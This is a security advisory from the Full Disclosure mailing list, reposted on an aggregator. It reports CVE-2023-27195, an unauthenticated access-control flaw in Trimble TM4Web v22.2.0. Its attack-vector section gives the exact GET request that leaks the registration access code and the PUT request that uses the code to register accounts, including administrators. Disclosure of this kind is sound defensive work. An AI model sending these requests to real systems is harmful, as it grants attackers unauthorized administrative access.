CVE-2023-27195: Broken Access Control - Registration Code in TM4Web v22.2.0
2024-4-11 14:42:45 Author: seclists.org(查看原文) 阅读量:16 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Clément Cruchet <clementcruchet () gmail com>
Date: Wed, 10 Apr 2024 14:52:52 -0400

CVE ID: CVE-2023-27195

Description:
An access control issue in Trimble TM4Web v22.2.0 allows
unauthenticated attackers to access a specific crafted URL path to
retrieve the last registration access code and use this access code to
register a valid account. If the access code was used to create an
Administrator account, attackers are also able to register new
Administrator accounts with full rights and privileges.

Vulnerability Type: Broken Access Control

Vendor of Product: Trimble - Transportation
(https://transportation.trimble.com/products/TM4Web)

Affected Product Code Base: TM4Web v22.2.0

Affected Component: User registration process

Attack Type: Remote

Impact: Privilege escalation / authentication bypass

Attack Vectors:*1. Accessing the last access code *

GET /inc/tm_ajax.msw?func=UserfromUUID&uuid=

Host: example.host.com


*2. Sending PUT request to create a new user account with previously
retrieved access code*

PUT /inc/tm_ajax.msw

Host: example.host.com [...]
WEB_UUID=&USERNAME=ccruchet&FIRST_NAME=test&LAST_NAME=test&COMPANY=test&DEPARTMENT=test&ADDRESS1=test&ADDRESS2=test&CITY=test&STATE_CODE=BC&COUNTRY_CODE=CA&POSTAL_CODE=J3L0B8&PHONE=1111111111&PHONE_EXT=&FAX=&EMAIL=test
 () gmail com&LANGUAGE=EN&ACCESS_CODE=XXXXXX&pwd1=Password123&pwd2=Password123&isReadonly=false&func=WebUser

Discoverer: Clément Cruchet (lutzenfried)

References:
- Official website: https://transportation.trimble.com/products/TM4Web
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CVE-2023-27195: Broken Access Control - Registration Code in TM4Web v22.2.0 Clément Cruchet (Apr 10)

文章来源: https://seclists.org/fulldisclosure/2024/Apr/16
如有侵权请联系:admin#unsafe.sh